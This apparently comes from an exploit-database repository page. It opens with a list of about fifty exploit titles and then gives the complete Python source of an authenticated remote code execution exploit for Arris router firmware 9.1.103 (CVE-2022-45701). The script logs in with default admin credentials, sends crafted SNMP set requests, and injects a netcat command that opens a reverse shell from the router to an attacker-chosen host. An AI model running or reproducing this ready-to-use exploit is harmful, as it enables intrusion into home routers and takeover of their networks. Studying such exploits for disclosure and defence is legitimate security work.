
50 changes to exploits/shellcodes/ghdb Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal and LFI ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated) Osprey Pump Controller 1.0.1 - (eventFileSelected) Command Injection Osprey Pump Controller 1.0.1 - (pseudonym) Semi-blind Command Injection Osprey Pump Controller 1.0.1 - (userName) Blind Command Injection Osprey Pump Controller 1.0.1 - Administrator Backdoor Access Osprey Pump Controller 1.0.1 - Authentication Bypass Credentials Modification Osprey Pump Controller 1.0.1 - Cross-Site Request Forgery Osprey Pump Controller 1.0.1 - Predictable Session Token / Session Hijack Osprey Pump Controller 1.0.1 - Unauthenticated File Disclosure Osprey Pump Controller 1.0.1 - Unauthenticated Remote Code Execution Exploit Osprey Pump Controller v1.0.1 - Unauthenticated Reflected XSS WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE HospitalRun 1.0.0-beta - Local Root Exploit for macOS Adobe Connect 10 - Username Disclosure craftercms 4.x.x - CORS EasyNas 1.1.0 - OS Command Injection Agilebio Lab Collector Electronic Lab Notebook v4.234 - Remote Code Execution (RCE) Art Gallery Management System Project in PHP v 1.0 - SQL injection atrocore 1.5.25 User interaction - Unauthenticated File upload - RCE Auto Dealer Management System 1.0 - Broken Access Control Exploit Auto Dealer Management System v1.0 - SQL Injection Auto Dealer Management System v1.0 - SQL Injection in sell_vehicle.php Auto Dealer Management System v1.0 - SQL Injection on manage_user.php Best pos Management System v1.0 - Remote Code Execution (RCE) on File Upload Best pos Management System v1.0 - SQL Injection ChurchCRM v4.5.3-121fcc1 - SQL Injection Dompdf 1.2.1 - Remote Code Execution (RCE) Employee Task Management System v1.0 - Broken Authentication Employee Task Management System v1.0 - SQL Injection on (task-details.php?task_id=?) Employee Task Management System v1.0 - SQL Injection on edit-task.php flatnux 2021-03.25 - Remote Code Execution (Authenticated) Intern Record System v1.0 - SQL Injection (Unauthenticated) Kimai-1.30.10 - SameSite Cookie-Vulnerability session hijacking LDAP Tool Box Self Service Password v1.5.2 - Account takeover Music Gallery Site v1.0 - Broken Access Control Music Gallery Site v1.0 - SQL Injection on music_list.php Music Gallery Site v1.0 - SQL Injection on page Master.php Music Gallery Site v1.0 - SQL Injection on page view_music_details.php POLR URL 2.3.0 - Shortener Admin Takeover Purchase Order Management-1.0 - Local File Inclusion Simple Food Ordering System v1.0 - Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) modoboa 2.0.4 - Admin TakeOver pdfkit v0.8.7.2 - Command Injection FileZilla Client 3.63.1 - 'TextShaping.dl' DLL Hijacking Windows 11 10.0.22000 - Backup service Privilege Escalation TitanFTP 2.0.1.2102 - Path traversal to Remote Code Execution (RCE) Unified Remote 3.13.0 - Remote Code Execution (RCE)
63 lines
No EOL
1.8 KiB
Python
Executable file
63 lines
No EOL
1.8 KiB
Python
Executable file
# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
|
|
# Date: 17/11/2022
|
|
# Exploit Author: Yerodin Richards
|
|
# Vendor Homepage: https://www.commscope.com/
|
|
# Version: 9.1.103
|
|
# Tested on: TG2482A, TG2492, SBG10
|
|
# CVE : CVE-2022-45701
|
|
|
|
import requests
|
|
import base64
|
|
|
|
router_host = "http://192.168.0.1"
|
|
username = "admin"
|
|
password = "password"
|
|
|
|
lhost = "192.168.0.6"
|
|
lport = 80
|
|
|
|
|
|
def main():
|
|
print("Authorizing...")
|
|
cookie = get_cookie(gen_header(username, password))
|
|
if cookie == '':
|
|
print("Failed to authorize")
|
|
exit(-1)
|
|
print("Generating Payload...")
|
|
payload = gen_payload(lhost, lport)
|
|
print("Sending Payload...")
|
|
send_payload(payload, cookie)
|
|
print("Done, check shell..")
|
|
|
|
def gen_header(u, p):
|
|
return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
|
|
|
|
def no_encode_params(params):
|
|
return "&".join("%s=%s" % (k,v) for k,v in params.items())
|
|
|
|
def get_cookie(header):
|
|
url = router_host+"/login"
|
|
params = no_encode_params({"arg":header, "_n":1})
|
|
resp=requests.get(url, params=params)
|
|
return resp.content.decode('UTF-8')
|
|
|
|
def set_oid(oid, cookie):
|
|
url = router_host+"/snmpSet"
|
|
params = no_encode_params({"oid":oid, "_n":1})
|
|
cookies = {"credential":cookie}
|
|
requests.get(url, params=params, cookies=cookies)
|
|
|
|
def gen_payload(h, p):
|
|
return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"
|
|
|
|
def send_payload(payload, cookie):
|
|
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
|
|
set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
|
|
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
|
|
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
|
|
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
|
|
set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
|
|
|
|
|
|
if __name__ == '__main__':
|
|
main() |